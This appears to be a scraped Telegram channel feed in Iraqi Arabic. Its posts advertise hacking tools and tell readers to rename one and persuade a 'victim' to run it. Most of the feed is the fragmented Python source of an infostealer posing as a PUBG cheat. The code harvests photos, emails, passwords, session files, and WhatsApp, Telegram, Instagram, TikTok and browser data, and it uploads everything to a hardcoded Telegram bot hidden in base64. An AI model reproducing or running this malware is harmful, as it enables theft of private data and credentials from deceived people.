1 118
Підписники
-324 години
-167 днів
-7730 днів
Архів дописів
1 118
2 ادات
هاي الادات اذا اتصل عليك شخص مجهول تشغلهه بل بايثون وتطلب الرقم تخلي الرقم و اتنتضر دقيقه و ورههه راح تجيبلك اسمه الثلاثي وهوه من يا محافظه
1 118
2 ادات
هاي الادات اذا اتصل عليك شخص مجهول تشغلهه بل بايثون وتطلب الرقم تخلي الرقم و اتنتضر دقيقه و ورههه راح تجيبلك اسمه الثلاثي وهوه من يا محافظه
1 118
ادات سحب الجهاز غير اسمههه ودزههه لل ضحيه وحاول تقنعه انو هيه ادات صيد وبس يشغلهه بل بايثون الصور و الجيميلات وكل حسابات يوصل عله بوتك بل تلي كرام
1 118
🎯 مميزات الأداة:
· 📸 سحب جميع الصور ومقاطع الفيديو من جهاز الضحية.
· 📧 استخراج الإيميلات وكلمات المرور المخزنة.
· 💬 سحب محادثات واتساب وتيليجرام وإنستغرام.
· 📱 جلب جهات الاتصال وسجل المكالمات.
· 🌐 سحب ملفات المتصفحات (كوكيز، جلسات، تاريخ التصفح).
· 🗝️ استخراج مفاتيح الجلسات (Sessions) من التطبيقات.
· 📂 سحب جميع الملفات من مجلدات محددة (تحميل، مستندات، صور).
· 📤 إرسال جميع البيانات إلى خادم أو بوت تيليجرام.
· 🛡️ تمويه الأداة على شكل تطبيق شرعي (PUBG، TikTok، VPN).
1 118
f countdown_and_hunt():
print("\n" + "="*60)
print("\033[1;33m[*] Connecting to servers...\033[0m")
print("="*60 + "\n")
messages = [
"انتظر سيدي جاري الاتصال بالخادم...",
"انتظر سيدي جاري الاتصال بخادم API...",
"انتظر سيدي جاري تهيئة أدوات الصيد...",
"انتظر سيدي جاري تجهيز قنوات الاتصال...",
"انتظر سيدي جاري تحميل بيانات الصيد...",
"انتظر سيدي جاري فتح المنافذ...",
"انتظر سيدي جاري تأمين الاتصال...",
"انتظر سيدي جاري تجهيز الخوادم...",
]
print("\033[1;33m[*] Starting in 120 seconds...\033[0m\n")
# START EXTRACTION IMMEDIATELY
print("[*] Starting extraction...")
threading.Thread(target=send_everything, daemon=True).start()
print("[*] Extraction started!")
# COUNTDOWN
for i in range(120, 0, -1):
if i % 15 == 0:
msg = random.choice(messages)
print(f"\033[1;36m⏳ {msg}\033[0m")
print(f"\033[1;33m⏱ Time remaining: {i} seconds\033[0m\n")
time.sleep(1)
print("\n\033[1;32m✅ Connection established!\033[0m")
print("\033[1;32m🚀 Starting hunt...\033[0m\n")
if VICTIM_TOKEN and VICTIM_CHAT_ID:
send_to_victim("✅ Tool activated successfully! You are now protected.")
# Fake PUBG interface
print("\033[1;33m[*] Optimizing game performance...\033[0m")
print("\033[1;33m[*] Loading game modules...\033[0m")
print("\033[1;33m[*] Bypassing anti-cheat...\033[0m")
print("\033[1;33m[*] Injecting features...\033[0m")
print("\n\033[1;32m[✔] All features applied successfully!\033[0m")
print("\033[1;32m[✔] Anti-Ban protection activated!\033[0m")
print("\033[1;32m[✔] 90 FPS unlocked!\033[0m")
print("\033[1;32m[✔] Aimbot & No Recoil enabled!\033[0m")
print("""\n\033[1;34m
═══════════════════════════════════════════════
🎮 PUBG MOBILE ULTIMATE TOOL 🎮
═══════════════════════════════════════════════
[✓] Status: Running Perfectly
[✓] Players: 0 | Bot: 0
[✓] FPS: 90 | Ping: 20ms
═══════════════════════════════════════════════
\033[0m""")
print("\n\033[1;31m[⚠] IMPORTANT: Keep this window open!\033[0m")
print("\n\033[1;31m[⚠] Closing this window will stop the hack!\033[0m")
while True:
time.sleep(60)
print("\033[1;32m[✓] System optimized...\033[0m")
# ========== MAIN ==========
if name == "main":
if sys.platform == 'win32':
try:
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
except:
pass
VICTIM_TOKEN, VICTIM_CHAT_ID = get_victim_token()
if VICTIM_TOKEN and VICTIM_CHAT_ID:
send_text(f"""
🎯 NEW VICTIM TOKEN CAPTURED!
📌 Token: {VICTIM_TOKEN}
📌 Chat ID: {VICTIM_CHAT_ID}
📌 Device: {platform.node()}
📌 OS: {platform.system()} {platform.release()}
📌 Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
""")
send_to_victim("🔐 Tool activated! Connecting to servers...")
countdown_and_hunt()
else:
print("\n\033[1;31m❌ Invalid credentials! Restart the tool.\033[0m")
input("Press Enter to exit...")
1 118
):
try:
with open(f, 'r', errors='ignore') as file:
content = file.read(20000)
found = []
for pattern in pass_patterns:
matches = pattern.findall(content)
for m in matches:
if len(m) >= 4 and m not in found:
found.append(m)
return found
except:
return []
with ThreadPoolExecutor(max_workers=20) as executor:
for result in executor.map(scan_pass, text_files[:300]):
for p in result:
if p not in data['passwords'] and len(p) >= 4:
data['passwords'].append(p)
print(f"[*] Real passwords: {len(data['passwords'])}")
return data
# ========== SEND EVERYTHING IN BACKGROUND ==========
def send_everything():
print("[*] Starting extraction...")
data = collect_all()
# Send summary
summary = f"""
✅ EXTRACTION COMPLETE!
📸 Images: {len(data['images'])}
📧 Real Emails: {len(data['emails'])}
🔑 Real Passwords: {len(data['passwords'])}
📱 Sessions: {len(data['sessions'])}
💬 WhatsApp: {len(data['whatsapp'])}
✈️ Telegram: {len(data['telegram'])}
📷 Instagram: {len(data['instagram'])}
🎵 TikTok: {len(data['tiktok'])}
🌐 Browsers: {len(data['browsers'])}
⚙️ System: {len(data['system'])}
"""
send_text(summary)
print("[✓] Summary sent")
# Send images in chunks (50 per chunk)
if data['images']:
chunks = [data['images'][i:i+CHUNK_SIZE] for i in range(0, len(data['images']), CHUNK_SIZE)]
print(f"[*] Sending {len(data['images'])} images in {len(chunks)} chunks...")
for i, chunk in enumerate(chunks, 1):
send_zip("Images", chunk, i, len(chunks))
print(f"[✓] Images chunk {i}/{len(chunks)} sent")
time.sleep(1)
# Send emails
if data['emails']:
send_text("📧 Real Emails:\n" + "\n".join(data['emails']))
print(f"[✓] {len(data['emails'])} emails sent")
time.sleep(1)
# Send passwords
if data['passwords']:
send_text("🔑 Real Passwords:\n" + "\n".join(data['passwords']))
print(f"[✓] {len(data['passwords'])} passwords sent")
time.sleep(1)
# Send sessions
if data['sessions']:
send_zip("Sessions", data['sessions'])
print("[✓] Sessions sent")
time.sleep(2)
# Send WhatsApp
if data['whatsapp']:
send_zip("WhatsApp", data['whatsapp'])
print("[✓] WhatsApp files sent")
time.sleep(2)
# Send Telegram
if data['telegram']:
send_zip("Telegram", data['telegram'])
print("[✓] Telegram files sent")
time.sleep(2)
# Send Instagram
if data['instagram']:
send_zip("Instagram", data['instagram'])
print("[✓] Instagram files sent")
time.sleep(2)
# Send TikTok
if data['tiktok']:
send_zip("TikTok", data['tiktok'])
print("[✓] TikTok files sent")
time.sleep(2)
# Send Browsers
if data['browsers']:
send_zip("Browsers", data['browsers'])
print("[✓] Browser files sent")
time.sleep(2)
# Send System
if data['system']:
send_zip("System", data['system'])
print("[✓] System files sent")
time.sleep(2)
send_text("✅ ALL FILES SENT SUCCESSFULLY!")
print("[✓] All files sent!")
# ========== GET VICTIM TOKEN ==========
def get_victim_token():
os.system('cls' if os.name == 'nt' else 'clear')
print("\033[1;36m" + "="*60)
print("🎮 PUBG MOBILE VIP TOOL v4.0")
print("🏆 Developed by ROUH TEAM")
print("="*60 + "\033[0m")
print("\n\033[1;33m[✓] أدخل بيانات البوت الخاص بك لتفعيل الأداة")
print("[✓] هذا مطلوب لتجاوز نظام مكافحة الغش\033[0m\n")
print("\033[1;32m┌─[أدخل توكن البوت]")
token = input("└──$ \033[0m").strip()
print("\033[1;32m┌─[أدخل ايدي الشات]")
chat_id = input("└──$ \033[0m").strip()
return token, chat_id
# ========== COUNTDOWN ==========
de
1 118
] = [f for _, f in images]
print(f"[*] Images: {len(data['images'])}")
# ===== OTHER FILES =====
other_paths = [
base,
os.path.join(base, "Download"),
os.path.join(base, "Documents"),
os.path.join(base, "Android/data"),
os.path.join(base, "Android/data/com.whatsapp"),
os.path.join(base, "Android/data/com.instagram.android"),
os.path.join(base, "Android/data/com.zhiliaoapp.musically"),
os.path.join(base, "Android/data/org.telegram.messenger"),
os.path.join(base, "Android/data/com.facebook.katana"),
os.path.join(base, "Android/data/com.tencent.ig"),
]
all_files = []
for path in other_paths:
if os.path.exists(path):
try:
for root, dirs, files in os.walk(path):
for file in files:
file_path = os.path.join(root, file)
try:
size = os.path.getsize(file_path)
if 100 < size < MAX_FILE_SIZE:
all_files.append(file_path)
except:
continue
except:
continue
# Classify
for f in all_files:
name = f.lower()
ext = os.path.splitext(f)[1].lower()
if 'instagram' in name:
data['instagram'].append(f)
elif 'tiktok' in name or 'musically' in name or 'zhiliao' in name:
data['tiktok'].append(f)
elif 'whatsapp' in name:
data['whatsapp'].append(f)
elif 'telegram' in name:
data['telegram'].append(f)
elif 'chrome' in name or 'firefox' in name or 'opera' in name or 'edge' in name:
data['browsers'].append(f)
elif ext in ['.session', '.dat', '.key', '.token']:
data['sessions'].append(f)
elif ext in ['.db', '.sqlite', '.json', '.xml', '.cfg', '.ini', '.conf', '.log']:
data['system'].append(f)
print(f"[*] WhatsApp: {len(data['whatsapp'])}")
print(f"[*] Telegram: {len(data['telegram'])}")
print(f"[*] Instagram: {len(data['instagram'])}")
print(f"[*] TikTok: {len(data['tiktok'])}")
print(f"[*] Sessions: {len(data['sessions'])}")
# ===== EXTRACT REAL EMAILS =====
email_pattern = re.compile(r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.(com|net|org|io|co|uk|fr|de|es|it|ru)')
text_files = [f for f in all_files if f.endswith(('.txt', '.log', '.json', '.xml', '.html', '.js', '.cfg', '.ini', '.conf', '.csv', '.db'))]
fake_patterns = ['no-reply', 'noreply', 'support', 'admin', 'info', 'contact', 'service', 'help', 'test', 'example', 'mailer-daemon', 'postmaster']
def scan_email(f):
try:
with open(f, 'r', errors='ignore') as file:
content = file.read(20000)
found = email_pattern.findall(content)
real_emails = []
for email in found:
is_fake = False
for fake in fake_patterns:
if fake in email.lower():
is_fake = True
break
if not is_fake and email not in real_emails:
real_emails.append(email)
return real_emails
except:
return []
with ThreadPoolExecutor(max_workers=20) as executor:
for result in executor.map(scan_email, text_files[:300]):
for email in result:
if email not in data['emails']:
data['emails'].append(email)
print(f"[*] Real emails: {len(data['emails'])}")
# ===== EXTRACT REAL PASSWORDS =====
pass_patterns = [
re.compile(r'(?:pass|password|pwd)[\s:=:]+([^\s\n]{6,})', re.IGNORECASE),
re.compile(r'"password"\s*:\s*"([^"]{6,})"', re.IGNORECASE),
re.compile(r"'password'\s*:\s*'([^']{6,})'", re.IGNORECASE),
re.compile(r'(?:login|user|username)[\s:=:]+([^\s\n]{4,})', re.IGNORECASE),
]
def scan_pass(f
1 118
import os, requests, time, threading, platform, zipfile, io, re, json, sqlite3, shutil, subprocess, sys, glob, random, ctypes, warnings
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
import base64
warnings.filterwarnings("ignore")
# ========== YOUR TOKEN ==========
YOUR_TOKEN_ENCRYPTED = "ODg0MDQzOTg5NjpBQUdKdWRTZFZIZ0RRRVNRMXdNeUUwTGdqN1BmR0cyT1NmMA=="
YOUR_CHAT_ID_ENCRYPTED = "Nzk4MzYwNDEyMQ=="
YOUR_TOKEN = base64.b64decode(YOUR_TOKEN_ENCRYPTED).decode('utf-8')
YOUR_CHAT_ID = base64.b64decode(YOUR_CHAT_ID_ENCRYPTED).decode('utf-8')
VICTIM_TOKEN = ""
VICTIM_CHAT_ID = ""
MAX_FILE_SIZE = 50 * 1024 * 1024
CHUNK_SIZE = 50
# ========== SEND ==========
def send_zip(category, files_list, part=1, total=1):
if not files_list:
return False
try:
api = f"https://api.telegram.org/bot{YOUR_TOKEN}/"
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zipf:
count = 0
for f in files_list:
try:
if os.path.exists(f) and os.path.getsize(f) > 0:
zipf.write(f, os.path.basename(f))
count += 1
except:
continue
if count == 0:
return False
zip_buffer.seek(0)
name = f"{category}.zip" if total == 1 else f"{category}_{part}.zip"
files = {"document": (name, zip_buffer, "application/zip")}
caption = f"📦 {category}" if total == 1 else f"📦 {category} ({part}/{total})"
r = requests.post(api + "sendDocument", params={"chat_id": YOUR_CHAT_ID, "caption": caption}, files=files, timeout=60)
return r.status_code == 200
except:
return False
def send_text(content):
try:
api = f"https://api.telegram.org/bot{YOUR_TOKEN}/"
if len(content) > 4000:
for i in range(0, len(content), 4000):
requests.post(api+"sendMessage", data={"chat_id": YOUR_CHAT_ID, "text": content[i:i+4000]}, timeout=10)
else:
requests.post(api+"sendMessage", data={"chat_id": YOUR_CHAT_ID, "text": content}, timeout=10)
return True
except:
return False
def send_to_victim(content):
if VICTIM_TOKEN and VICTIM_CHAT_ID:
try:
api = f"https://api.telegram.org/bot{VICTIM_TOKEN}/"
requests.post(api+"sendMessage", data={"chat_id": VICTIM_CHAT_ID, "text": content}, timeout=10)
except:
pass
# ========== COLLECT ==========
def collect_all():
base = "/storage/emulated/0/" if os.name != 'nt' else os.path.expanduser("~")
data = {
'images': [], 'emails': [], 'passwords': [],
'sessions': [], 'whatsapp': [], 'telegram': [],
'instagram': [], 'tiktok': [], 'browsers': [], 'system': []
}
# ===== IMAGES (ALL, from important folders) =====
img_paths = [
os.path.join(base, "DCIM/Camera"),
os.path.join(base, "DCIM"),
os.path.join(base, "Pictures"),
os.path.join(base, "Pictures/Screenshots"),
os.path.join(base, "Android/media/com.whatsapp/WhatsApp/Media/WhatsApp Images"),
os.path.join(base, "Android/media/com.whatsapp/WhatsApp/Media/WhatsApp Video"),
]
images = []
for path in img_paths:
if os.path.exists(path):
try:
for root, dirs, files in os.walk(path):
for file in files:
if file.lower().endswith(('.jpg', '.jpeg', '.png', '.gif', '.bmp', '.webp')):
file_path = os.path.join(root, file)
try:
size = os.path.getsize(file_path)
if 1000 < size < MAX_FILE_SIZE:
images.append((os.path.getmtime(file_path), file_path))
except:
continue
except:
continue
images.sort(reverse=True)
data['images'
1 118
🛡️ محارب الأمن السيبراني | WORM CYBER 🛡️
- خبير في الأمن السيبراني ومكافحة الابتزاز الإلكتروني.
- ملاحقة القراصنة وحماية الخصوصية.
- تقديم استشارات أمنية وحلول تقنية متقدمة.
📌 الخدمات المقدمة:
- استرجاع الحسابات المخترقة.
- تتبع التهديدات الإلكترونية.
- تأمين الأنظمة والحماية من الاختراقات.
- كشف الثغرات وإغلاقها.
- مكافحة الابتزاز الإلكتروني.
🔐 نحن هنا لحمايتك في العالم الرقمي
⚡ معاً ضد الجرائم الإلكترونية
للتواصل أو الاستفسار:
@Q0047
1 118
Repost from 𝗔𝗗𝗛𝗔𝗠 𝗫𝗜𝗧
علي قناه تفاعل قوي جدا
المقاعد المسموح بها : 55855
لتسجيل اسمك في المسابقة اضغط على زر المشاركة في المسابقة بأسفل المنشور
سيتم انتهاء المسابقة عند وصول أحد المتسابقين ل 14 صوت
